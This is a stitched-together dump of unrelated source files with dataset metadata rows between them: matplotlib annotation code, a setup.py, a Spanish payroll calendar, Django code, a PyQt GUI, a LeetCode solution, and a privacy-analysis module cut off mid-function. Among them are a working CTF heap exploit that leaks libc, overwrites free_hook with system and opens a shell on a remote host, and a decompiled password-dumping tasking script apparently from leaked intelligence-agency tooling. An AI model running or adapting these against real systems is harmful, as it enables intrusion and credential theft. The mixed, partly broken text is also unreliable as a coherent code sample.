and if *textcoords* = *None*, defaults to *xycoords*).
*arrowprops*, if not *None*, is a dictionary of line properties
(see :class:`matplotlib.lines.Line2D`) for the arrow that connects
annotation to the point.
If the dictionary has a key *arrowstyle*, a FancyArrowPatch
instance is created with the given dictionary and is
drawn. Otherwise, a YAArow patch instance is created and
drawn. Valid keys for YAArow are
========= =============================================================
Key Description
========= =============================================================
width the width of the arrow in points
frac the fraction of the arrow length occupied by the head
headwidth the width of the base of the arrow head in points
shrink oftentimes it is convenient to have the arrowtip
and base a bit away from the text and point being
annotated. If *d* is the distance between the text and
annotated point, shrink will shorten the arrow so the tip
and base are shink percent of the distance *d* away from the
endpoints. ie, ``shrink=0.05 is 5%%``
? any key for :class:`matplotlib.patches.polygon`
========= =============================================================
Valid keys for FancyArrowPatch are
=============== ======================================================
Key Description
=============== ======================================================
arrowstyle the arrow style
connectionstyle the connection style
relpos default is (0.5, 0.5)
patchA default is bounding box of the text
patchB default is None
shrinkA default is 2 points
shrinkB default is 2 points
mutation_scale default is text size (in points)
mutation_aspect default is 1.
? any key for :class:`matplotlib.patches.PathPatch`
=============== ======================================================
*xycoords* and *textcoords* are strings that indicate the
coordinates of *xy* and *xytext*.
================= ===================================================
Property Description
================= ===================================================
'figure points' points from the lower left corner of the figure
'figure pixels' pixels from the lower left corner of the figure
'figure fraction' 0,0 is lower left of figure and 1,1 is upper, right
'axes points' points from lower left corner of axes
'axes pixels' pixels from lower left corner of axes
'axes fraction' 0,1 is lower left of axes and 1,1 is upper right
'data' use the coordinate system of the object being
annotated (default)
'offset points' Specify an offset (in points) from the *xy* value
'polar' you can specify *theta*, *r* for the annotation,
even in cartesian plots. Note that if you
are using a polar axes, you do not need
to specify polar for the coordinate
system since that is the native "data" coordinate
system.
================= ===================================================
If a 'points' or 'pixels' option is specified, values will be
added to the bottom-left and if negative, values will be
subtracted from the top-right. Eg::
# 10 points to the right of the left border of the axes and
# 5 points below the top border
xy=(10,-5), xycoords='axes points'
Additional kwargs are Text properties:
%(Text)s
"""
if xytext is None:
xytext = xy
if textcoords is None:
textcoords = xycoords
# we'll draw ourself after the artist we annotate by default
x,y = self.xytext = xytext
Text.__init__(self, x, y, s, **kwargs)
self.xy = xy
self.xycoords = xycoords
self.textcoords = textcoords
self.arrowprops = arrowprops
self.arrow = None
if arrowprops and arrowprops.has_key("arrowstyle"):
self._arrow_relpos = arrowprops.pop("relpos", (0.5, 0.5))
self.arrow_patch = FancyArrowPatch((0, 0), (1,1),
**arrowprops)
else:
self.arrow_patch = None
__init__.__doc__ = cbook.dedent(__init__.__doc__) % artist.kwdocd
def contains(self,event):
t,tinfo = Text.contains(self,event)
if self.arrow is not None:
a,ainfo=self.arrow.contains(event)
t = t or a
# self.arrow_patch is currently not checked as this can be a line - JJ
return t,tinfo
def set_figure(self, fig):
if self.arrow is not None:
self.arrow.set_figure(fig)
if self.arrow_patch is not None:
self.arrow_patch.set_figure(fig)
Artist.set_figure(self, fig)
def _get_xy(self, x, y, s):
if s=='data':
trans = self.axes.transData
x = float(self.convert_xunits(x))
y = float(self.convert_yunits(y))
return trans.transform_point((x, y))
elif s=='offset points':
# convert the data point
dx, dy = self.xy
# prevent recursion
if self.xycoords == 'offset points':
return self._get_xy(dx, dy, 'data')
dx, dy = self._get_xy(dx, dy, self.xycoords)
# convert the offset
dpi = self.figure.get_dpi()
x *= dpi/72.
y *= dpi/72.
# add the offset to the data point
x += dx
y += dy
return x, y
elif s=='polar':
theta, r = x, y
x = r*np.cos(theta)
y = r*np.sin(theta)
trans = self.axes.transData
return trans.transform_point((x,y))
elif s=='figure points':
#points from the lower left corner of the figure
dpi = self.figure.dpi
l,b,w,h = self.figure.bbox.bounds
r = l+w
t = b+h
x *= dpi/72.
y *= dpi/72.
if x<0:
x = r + x
if y<0:
y = t + y
return x,y
elif s=='figure pixels':
#pixels from the lower left corner of the figure
l,b,w,h = self.figure.bbox.bounds
r = l+w
t = b+h
if x<0:
x = r + x
if y<0:
y = t + y
return x, y
elif s=='figure fraction':
#(0,0) is lower left, (1,1) is upper right of figure
trans = self.figure.transFigure
return trans.transform_point((x,y))
elif s=='axes points':
#points from the lower left corner of the axes
dpi = self.figure.dpi
l,b,w,h = self.axes.bbox.bounds
r = l+w
t = b+h
if x<0:
x = r + x*dpi/72.
else:
x = l + x*dpi/72.
if y<0:
y = t + y*dpi/72.
else:
y = b + y*dpi/72.
return x, y
elif s=='axes pixels':
#pixels from the lower left corner of the axes
l,b,w,h = self.axes.bbox.bounds
r = l+w
t = b+h
if x<0:
x = r + x
else:
x = l + x
if y<0:
y = t + y
else:
y = b + y
return x, y
elif s=='axes fraction':
#(0,0) is lower left, (1,1) is upper right of axes
trans = self.axes.transAxes
return trans.transform_point((x, y))
def update_positions(self, renderer):
x, y = self.xytext
self._x, self._y = self._get_xy(x, y, self.textcoords)
x, y = self.xy
x, y = self._get_xy(x, y, self.xycoords)
ox0, oy0 = self._x, self._y
ox1, oy1 = x, y
if self.arrowprops:
x0, y0 = x, y
l,b,w,h = self.get_window_extent(renderer).bounds
r = l+w
t = b+h
xc = 0.5*(l+r)
yc = 0.5*(b+t)
d = self.arrowprops.copy()
# Use FancyArrowPatch if self.arrowprops has "arrowstyle" key.
# Otherwise, fallback to YAArrow.
#if d.has_key("arrowstyle"):
if self.arrow_patch:
# adjust the starting point of the arrow relative to
# the textbox.
# TODO : Rotation needs to be accounted.
relpos = self._arrow_relpos
bbox = self.get_window_extent(renderer)
ox0 = bbox.x0 + bbox.width * relpos[0]
oy0 = bbox.y0 + bbox.height * relpos[1]
# The arrow will be drawn from (ox0, oy0) to (ox1,
# oy1). It will be first clipped by patchA and patchB.
# Then it will be shrinked by shirnkA and shrinkB
# (in points). If patch A is not set, self.bbox_patch
# is used.
self.arrow_patch.set_positions((ox0, oy0), (ox1,oy1))
mutation_scale = d.pop("mutation_scale", self.get_size())
mutation_scale = renderer.points_to_pixels(mutation_scale)
self.arrow_patch.set_mutation_scale(mutation_scale)
if self._bbox_patch:
patchA = d.pop("patchA", self._bbox_patch)
self.arrow_patch.set_patchA(patchA)
else:
patchA = d.pop("patchA", self._bbox)
self.arrow_patch.set_patchA(patchA)
else:
# pick the x,y corner of the text bbox closest to point
# annotated
dsu = [(abs(val-x0), val) for val in l, r, xc]
dsu.sort()
_, x = dsu[0]
dsu = [(abs(val-y0), val) for val in b, t, yc]
dsu.sort()
_, y = dsu[0]
shrink = d.pop('shrink', 0.0)
theta = math.atan2(y-y0, x-x0)
r = math.sqrt((y-y0)**2. + (x-x0)**2.)
dx = shrink*r*math.cos(theta)
dy = shrink*r*math.sin(theta)
width = d.pop('width', 4)
headwidth = d.pop('headwidth', 12)
frac = d.pop('frac', 0.1)
self.arrow = YAArrow(self.figure, (x0+dx,y0+dy), (x-dx, y-dy),
width=width, headwidth=headwidth, frac=frac,
**d)
self.arrow.set_clip_box(self.get_clip_box())
def draw(self, renderer):
"""
Draw the :class:`Annotation` object to the given *renderer*.
"""
self.update_positions(renderer)
self.update_bbox_position_size(renderer)
if self.arrow is not None:
if self.arrow.figure is None and self.figure is not None:
self.arrow.figure = self.figure
self.arrow.draw(renderer)
if self.arrow_patch is not None:
if self.arrow_patch.figure is None and self.figure is not None:
self.arrow_patch.figure = self.figure
self.arrow_patch.draw(renderer)
Text.draw(self, renderer)
artist.kwdocd['Annotation'] = Annotation.__init__.__doc__
|
agpl-3.0
| -2,341,165,572,429,736,400
| 33.207279
| 209
| 0.548079
| false
| 4.069426
| false
| false
| false
|
kolypto/py-mailem
|
setup.py
|
1
|
1208
|
#!/usr/bin/env python
""" Slim, flexible, yet full-featured e-mailing library """
from setuptools import setup, find_packages
setup(
# http://pythonhosted.org/setuptools/setuptools.html
name='mailem',
version='0.0.5',
author='Mark Vartanyan',
author_email='kolypto@gmail.com',
url='https://github.com/kolypto/py-mailem',
license='BSD',
description=__doc__,
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
keywords=['e-mail', 'mail', 'template'],
packages=find_packages(),
scripts=[],
entry_points={},
install_requires=[
'future',
],
extras_require={
},
include_package_data=True,
test_suite='nose.collector',
platforms='any',
classifiers=[
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
bsd-2-clause
| -4,548,813,202,391,579,000
| 27.093023
| 71
| 0.620033
| false
| 3.922078
| false
| true
| false
|
maaruiz/Nominas2015ES
|
Funciones/Datos/calendario_dat.py
|
1
|
9946
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import calendar
import datetime
from Funciones.funs import ultimodiames, select_sql
from Funciones.Datos.contrato_dat import Contrato
from wstools.Utility import DOM
class Calendario:
"""
Realiza los calculos necesarios de los dias de trabajo entre dos fechas.
Se necesitan pasar dos parámetros:
desde -> tipo lista que contiene anio, mes y dia iniciales
desde = (anio, mes, dia)
hasta -> tipo lista que contiene anio, mes y dia finales
hasta = (anio, mes, dia)
"""
def __init__(self, idcalendario, anio):
"""
Inicializa las variables que se necesitan:
primero = dia inicial (variable datetime.date)
ultimo = dia ultimo (variable datetime.date)
Lista desde:
desdeanio = anio inicial (var. INT)
desdemes = mes anio inicial (var INT)
desdedia = dia anio inicial (var INT)
Lista hasta:
hastaanio = anio final (var INT)
hastames = mes anio final (var INT)
hastadia = dia anio final (var INT)
"""
self.calendario_id = idcalendario
self.anio = anio
self.desde(self.anio,1,1)
self.hasta(self.anio,12,31)
sql = ( "Select "
"A.idcalendario, A.descripcion, A.idmunicipio, "
"B.anio, B.mes, B.dia, B.idcal_festivo, "
"B.esfestivo_nnal, B.esfestivo_reg, B.esfestivo_loc, "
"B.esfestivo_convenio "
"From "
"calendario A "
"inner join "
"cal_festivos B "
"on A.idcalendario = B.idcalendario "
"Where "
"A.idcalendario = %s "
"and B.anio = %s;")
self.diasfestivos = select_sql((sql,(self.calendario_id, self.anio)),1)
self.totalanios = self.hastaanio - self.desdeanio
self.nolaboral()
def __call__(self, idcalendario, anio):
self.__init__(idcalendario, anio)
def desde(self, anio, mes, dia):
self.desdeanio = anio
self.desdemes = mes
self.desdedia = dia
self.primero = datetime.date(self.desdeanio, self.desdemes, self.desdedia)
return anio, mes, dia
def hasta(self, anio, mes, dia):
self.hastaanio = anio
self.hastames = mes
self.hastadia = dia
self.ultimo = datetime.date(self.hastaanio, self.hastames, self.hastadia)
return self.hastaanio, self.hastames, self.hastadia
def nolaboral(self):
"""
Calcula el número de fines de semana y festivos entre las fechas introducias y
devuelve los valores de (sab, dom, fes)
"""
sab = 0
dom = 0
fes = 0
for xanio in range(self.desdeanio, self.hastaanio + 1):
if xanio < self.hastaanio and xanio == self.desdeanio:
for xmes in range(self.desdemes, 12 + 1):
if xmes == self.desdemes:
sab = sab + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, self.desdedia, self.hastadia)
else :
sab = sab + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id,xanio, xmes, 1,
ultimodiames(xmes, xanio))
elif self.hastaanio > xanio > self.desdeanio:
for xmes in range(1,12+1):
sab = sab + self.diasemana_delmes(xanio, xmes,
1, ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes,
1, ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes,
1, ultimodiames(xmes, xanio))
elif xanio == self.hastaanio and xanio > self.desdeanio:
for xmes in range(1, self.hastames + 1):
if xmes == self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, 1, self.hastadia)
else:
sab = sab + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, 1, ultimodiames(xmes, xanio))
elif xanio == self.hastaanio and xanio == self.desdeanio:
for xmes in range(self.desdemes, self.hastames + 1):
if xmes == self.desdemes and xmes < self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, self.desdedia,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio,
xmes, self.desdedia,
ultimodiames(xmes, xanio))
elif self.desdemes < xmes < self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1,
ultimodiames(xmes, xanio), 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes,
1, ultimodiames(xmes, xanio))
elif xmes > self.desdemes and xmes == self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 5)
dom = dom + self.diasemana_delmes(xanio, xmes, 1, self.hastadia, 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes,
1, self.hastadia)
elif xmes == self.desdemes and xmes == self.hastames:
sab = sab + self.diasemana_delmes(xanio, xmes, self.desdedia,
self.hastadia, 5)
dom = dom + self.diasemana_delmes(xanio, xmes, self.desdedia,
self.hastadia, 6)
fes = fes + self.festivosdelmes(self.calendario_id, xanio, xmes, self.desdedia,
self.hastadia)
self.totaldomingos = dom
self.totalsabados = sab
self.totalfestivos = fes
self.diastotales = (self.ultimo - self.primero).days + 1
self.totalefectivos = self.diastotales - self.totalsabados - self.totaldomingos - self.totalfestivos
return sab,dom, fes
def festivosdelmes(self, calendario, anio, mes, desdedia, hastadia):
"""
Calcula el numero de dias festivos de un mes teniendo en cuenta las
fechas introducidas.
Los parámetros que hay que introducir son de tipo INT
Dias.festivosdelmes(calendario, anio, mes, desdedia, hastadia)
Los diasfestivos deben aportarse de un calendario externo.
"""
sql = ( "Select "
"count(*) "
"From "
"cal_festivos "
"Where "
"idcalendario = %s "
"and anio = %s "
"and mes = %s "
"and dia >= %s "
"and dia <= %s "
"Group by "
"idcalendario;")
dato = 0
try:
dato = select_sql((sql, (calendario, anio, mes, desdedia, hastadia)))[0]
except:
pass
return dato
def diasemana_delmes(self, anio, mes, desdedia, hastadia, diasemana):
"""
Calcula el número de un dia de la semana entre fechas
0 = lunes
1 = martes
2 = miercoles
3= jueves
4 = viernes
5 = sabado
6 = domingo
"""
calmes = calendar.Calendar().monthdays2calendar(anio, mes)
x = 0
for c in calmes:
if desdedia <= c[diasemana][0] <= hastadia:
x += 1
return x
def dias_entre_fechas(self):
contrato = Contrato()
dia_final = self.hasta(anio, mes, dia)
|
gpl-3.0
| -3,972,020,743,834,412,000
| 46.574163
| 108
| 0.476363
| false
| 3.465319
| false
| false
| false
|
qdqmedia/wiggum
|
wiggum/users/migrations/0011_auto_20151023_1228.py
|
1
|
1421
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import uuid
import django.utils.timezone
def gen_uuid(apps, schema_editor):
UserModel = apps.get_model('users', 'User')
for row in UserModel.objects.all():
row.sfa_token = uuid.uuid4()
row.save()
class Migration(migrations.Migration):
dependencies = [
('users', '0010_auto_wiggum_permission_data'),
]
operations = [
migrations.AddField(
model_name='user',
name='sfa_token',
field=models.UUIDField(null=True, editable=False, unique=True, verbose_name='SFA token'),
),
migrations.RunPython(gen_uuid, reverse_code=migrations.RunPython.noop),
migrations.AlterField(
model_name='user',
name='sfa_token',
field=models.UUIDField(editable=False, unique=True, verbose_name='SFA token'),
),
migrations.AddField(
model_name='user',
name='sfa_token_expire',
field=models.DateTimeField(verbose_name='SFA token expiration', default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='user',
name='password_reset_token_expire',
field=models.DateTimeField(verbose_name='Password reset token expiration', default=django.utils.timezone.now),
),
]
|
bsd-3-clause
| 5,595,121,689,004,847,000
| 29.891304
| 122
| 0.613652
| false
| 4.036932
| false
| false
| false
|
fschimpf/graf2il
|
GUI/sekvens.py
|
1
|
1815
|
import sys
sys.path.append('../')
from PyQt4 import QtGui, QtCore
from sekvens_gui import Ui_MainWindow
import graf2il
class MeinProgramm(QtGui.QMainWindow, Ui_MainWindow):
def __init__(self):
QtGui.QWidget.__init__(self)
self.setupUi(self)
XMLFileToCompileName = 'test'
# connect slots for GUI-elements
self.connect(self.pushButton_2, QtCore.SIGNAL('clicked (bool)'), self.start_graf2il)
self.connect(self.pushButton_3, QtCore.SIGNAL('clicked (bool)'), self.chooseInFile)
self.statusBar().showMessage('Malvik VGS - Fritz Schimpf')
def start_graf2il(self):
self.statusBar().showMessage('Script graf2il aktiv')
# start graf2il with correct setting for target language
if self.comboBox.currentIndex() == 0:
graf2il.main(self.XMLFileToCompileName,'awl')
elif self.comboBox.currentIndex() == 1:
graf2il.main(self.XMLFileToCompileName,'scl')
self.statusBar().showMessage('Malvik VGS - Fritz Schimpf')
def chooseInFile(self):
self.statusBar().showMessage('Velg inputfil')
self.XMLFileToCompileName = str(QtGui.QFileDialog.getOpenFileName(self, 'Velg fil som skal bli oversatt', '', 'JGrafchart XML-filer (*.xml);;alle filer (*.*)'))
self.lineEdit.setText(self.XMLFileToCompileName)
self.statusBar().showMessage('Malvik VGS - Fritz Schimpf')
app = QtGui.QApplication(sys.argv)
#locale = QtCore.QLocale.system().name()
locale = "nb_NO"
#locale = "de_DE"
#locale = "en_EN"
#print (locale)
translator = QtCore.QTranslator()
if translator.load("translation_" + locale, "./"):
app.installTranslator(translator)
programm = MeinProgramm()
programm.show()
sys.exit(app.exec_()) # infinite loop
|
gpl-3.0
| -6,599,197,859,360,954,000
| 34.588235
| 168
| 0.660606
| false
| 3.418079
| false
| false
| false
|
scwuaptx/CTF
|
2017-writeup/secuinside/bugsystem.py
|
1
|
1764
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#host = "10.211.55.6"
#port = 8888
host = "13.112.128.199"
port = 1337
for i in range(10):
r = remote(host,port)
def add(name,size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.send(content)
def edit(idx,types,value,data):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(types))
r.recvuntil(":")
r.sendline(str(value))
r.recvuntil(":")
r.send(data)
def view():
r.recvuntil(":")
r.sendline("2")
def delbug(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
add("dada",128,"nogg") #1
add("dada",128,"gogo") #2
delbug(1)
add("dada",32,"fuck") #3
view()
r.recvuntil("fuck")
data = r.recvuntil("\n")[:-1]
if len(data) < 4 :
r.close()
continue
libc = u32(data) - 0x1b07f0
print hex(libc)
add("da",32,"sh\x00") #4
add("da",32,"sh\x00") #5
delbug(0)
delbug(3)
delbug(4)
delbug(5)
add("ora",32,"lays")
view()
r.recvuntil("lays")
data = r.recvuntil("\n")[:-1]
if len(data) < 4 :
r.close()
continue
heap = u32(data) - 0x40
print hex(heap)
obj = heap + 0x178
free_hook = libc +0x1b18b0
system = libc + 0x3a940
off = free_hook - obj - 0x100000000
add("sh\x00",0x21000,"/bin/sh\x00")
edit(2,3,off,p32(system))
delbug(7)
r.interactive()
|
gpl-2.0
| -8,374,999,728,743,337,000
| 19.511628
| 39
| 0.494331
| false
| 2.94
| false
| false
| false
|
yelu/leetcode
|
DP/UniquePathsII.py
|
1
|
1063
|
class Solution:
# @param obstacleGrid, a list of lists of integers
# @return an integer
# [[0 for j in range(len(obstacleGrid[i]))]
# for i in range(len(obstacleGrid))]
# F[i][j] = F[i-1][j] + F[i][j-1], F[i][j] if i <0 or j < 0 or
def uniquePathsWithObstacles(self, obstacleGrid):
res = [[0 for j in range(len(obstacleGrid[i]))]
for i in range(len(obstacleGrid))]
for i in range(len(obstacleGrid)) :
for j in range(len(obstacleGrid[i])) :
if not i and not j and not obstacleGrid[0][0]: res[0][0] = 1; continue
if not obstacleGrid[i][j] :
res[i][j] = (0 if i-1<0 else res[i-1][j])+\
(0 if j-1<0 else res[i][j-1])
# for i in range(len(obstacleGrid)) :
# for j in range(len(obstacleGrid[0])) :
# print res[i][j]
return res[len(obstacleGrid)-1][len(obstacleGrid[0])-1]
ob = [
[0,0,0],
[0,1,0],
[0,0,0]
]
sol = Solution()
print sol.uniquePathsWithObstacles(ob)
|
gpl-2.0
| 2,702,322,879,902,214,700
| 36.964286
| 86
| 0.528692
| false
| 2.761039
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Tasking/Mcl_Cmd_PasswordDump_Tasking.py
|
1
|
2486
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_PasswordDump_Tasking.py
CMD_PW_TYPE_ALL = 0
CMD_PW_TYPE_PERMANENT = 1
CMD_PW_TYPE_CACHED = 2
CMD_PW_TYPE_DIGEST = 3
def TaskingMain(namespace):
import mcl.imports
import mcl.target
import mcl.tasking
import mcl.tasking.technique
from mcl.object.Message import MarshalMessage
mcl.imports.ImportWithNamespace(namespace, 'mca.survey.cmd.passworddump', globals())
mcl.imports.ImportWithNamespace(namespace, 'mca.survey.cmd.passworddump.tasking', globals())
lpParams = mcl.tasking.GetParameters()
tgtParams = mca.survey.cmd.passworddump.Params()
tgtParams.threadProvider = mcl.tasking.technique.Lookup('PASSWORDDUMP', mcl.tasking.technique.TECHNIQUE_MCL_INJECT, lpParams['thread'])
tgtParams.memoryProvider = mcl.tasking.technique.Lookup('PASSWORDDUMP', mcl.tasking.technique.TECHNIQUE_MCL_MEMORY, lpParams['memory'])
if lpParams['type'] == CMD_PW_TYPE_ALL:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_PERMANENT | mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_CACHED
elif lpParams['type'] == CMD_PW_TYPE_PERMANENT:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_PERMANENT
elif lpParams['type'] == CMD_PW_TYPE_CACHED:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_CACHED
elif lpParams['type'] == CMD_PW_TYPE_DIGEST:
tgtParams.type = mca.survey.cmd.passworddump.PARAMS_TYPE_FLAGS_DIGEST
else:
mcl.tasking.OutputError('Invalid password type (%u)' % lpParams['type'])
return False
rpc = mca.survey.cmd.passworddump.tasking.RPC_INFO_DUMP
msg = MarshalMessage()
tgtParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
taskXml = mcl.tasking.Tasking()
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_MEMORY, tgtParams.memoryProvider)
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_INJECT, tgtParams.threadProvider)
mcl.tasking.OutputXml(taskXml.GetXmlObject())
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.survey.cmd.passworddump.errorStrings)
return False
return True
if __name__ == '__main__':
import sys
if TaskingMain(sys.argv[1]) != True:
sys.exit(-1)
|
unlicense
| -3,902,764,518,018,893,000
| 45.924528
| 139
| 0.723652
| false
| 2.959524
| false
| false
| false
|
orlenko/sfpirg
|
sfpirgapp/views/actiongroups.py
|
1
|
5045
|
from django.conf import settings
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from django.http.response import HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template.context import RequestContext
from mezzanine.utils.email import send_mail_template
from sfpirgapp.forms import ActionGroupForm
from sfpirgapp.models import ActionGroup, Settings
import logging
from sfpirgapp.forms import ActionGroupRequestForm
from django.shortcuts import resolve_url
from django.contrib.auth.decorators import login_required
from sfpirgapp.templatetags.sfpirg_tags import _category_by_model
log = logging.getLogger(__name__)
def aglist(request):
aglist = ActionGroup.objects.all().order_by('title')
paginator = Paginator(aglist, 10)
page = request.GET.get('page')
try:
aglist = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
aglist = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
aglist = paginator.page(paginator.num_pages)
context = RequestContext(request, locals())
return render_to_response('sfpirg/aglist.html', {}, context_instance=context)
def actiongroup(request, slug):
actiongroup = get_object_or_404(ActionGroup, slug=slug)
page = actiongroup
current_item = page.title
form = None
if 'edit' in request.REQUEST:
form = ActionGroupForm(request.POST or None, request.FILES or None, instance=actiongroup)
if request.method == 'POST' and form.is_valid():
form.save()
return HttpResponseRedirect(actiongroup.get_absolute_url())
else:
if not (request.user.is_superuser or request.user == actiongroup.user):
return HttpResponseRedirect(actiongroup.get_absolute_url())
context = RequestContext(request, locals())
return render_to_response('pages/actiongroup.html', {}, context_instance=context)
def request_group(request):
try:
form = ActionGroupRequestForm(request.POST or None)
if request.method == 'POST' and form.is_valid():
form.save()
actiongroup = form.instance
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_application',
Settings.get_setting('SERVER_EMAIL'),
actiongroup.contact_email,
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_admin_application',
Settings.get_setting('SERVER_EMAIL'),
Settings.get_setting('ACTION_GROUPS_ADMIN_EMAIL'),
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
return HttpResponseRedirect(resolve_url('thankyou'))
current_item = 'Action Group Request'
context = RequestContext(request, locals())
return render_to_response('sfpirg/action_group_request.html', {}, context_instance=context)
except:
log.error('Failed to process request', exc_info=1)
@login_required
def create(request):
user = request.user
# See if this user already has an actiongroup - no need to create then.
for existing in ActionGroup.objects.filter(user=user):
return HttpResponseRedirect(existing.get_absolute_url() + '?edit=1')
initial = {'user': user, 'status': 1, '_order': 0}
cat = _category_by_model(ActionGroup)
initial['category'] = cat
form = ActionGroupForm(request.POST or None, request.FILES or None, initial=initial)
if request.method == 'POST' and form.is_valid():
form.save()
actiongroup = form.instance
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_application',
Settings.get_setting('SERVER_EMAIL'),
user.email,
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
send_mail_template('Action Group Application Submitted: %s' % actiongroup.title,
'sfpirg/email/ag_admin_application',
Settings.get_setting('SERVER_EMAIL'),
Settings.get_setting('ACTION_GROUPS_ADMIN_EMAIL'),
context=locals(),
attachments=None,
fail_silently=settings.DEBUG,
addr_bcc=None)
return HttpResponseRedirect(resolve_url('thankyou'))
current_item = 'Create Action Group'
context = RequestContext(request, locals())
return render_to_response('sfpirg/action_group_create.html', {}, context_instance=context)
|
bsd-2-clause
| -6,149,214,096,364,828,000
| 42.869565
| 99
| 0.649554
| false
| 4.17287
| false
| false
| false
|
cshallue/models
|
research/differential_privacy/pate/smooth_sensitivity.py
|
1
|
13739
|
# Copyright 2017 The 'Scalable Private Learning with PATE' Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for smooth sensitivity analysis for PATE mechanisms.
This library implements functionality for doing smooth sensitivity analysis
for Gaussian Noise Max (GNMax), Threshold with Gaussian noise, and Gaussian
Noise with Smooth Sensitivity (GNSS) mechanisms.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
import numpy as np
import scipy
import sympy as sp
import core as pate
################################
# SMOOTH SENSITIVITY FOR GNMAX #
################################
# Global dictionary for storing cached q0 values keyed by (sigma, order).
_logq0_cache = {}
def _compute_logq0(sigma, order):
key = (sigma, order)
if key in _logq0_cache:
return _logq0_cache[key]
logq0 = compute_logq0_gnmax(sigma, order)
_logq0_cache[key] = logq0 # Update the global variable.
return logq0
def _compute_logq1(sigma, order, num_classes):
logq0 = _compute_logq0(sigma, order) # Most likely already cached.
logq1 = math.log(_compute_bl_gnmax(math.exp(logq0), sigma, num_classes))
assert logq1 <= logq0
return logq1
def _compute_mu1_mu2_gnmax(sigma, logq):
# Computes mu1, mu2 according to Proposition 10.
mu2 = sigma * math.sqrt(-logq)
mu1 = mu2 + 1
return mu1, mu2
def _compute_data_dep_bound_gnmax(sigma, logq, order):
# Applies Theorem 6 in Appendix without checking that logq satisfies necessary
# constraints. The pre-conditions must be assured by comparing logq against
# logq0 by the caller.
variance = sigma**2
mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
eps1 = mu1 / variance
eps2 = mu2 / variance
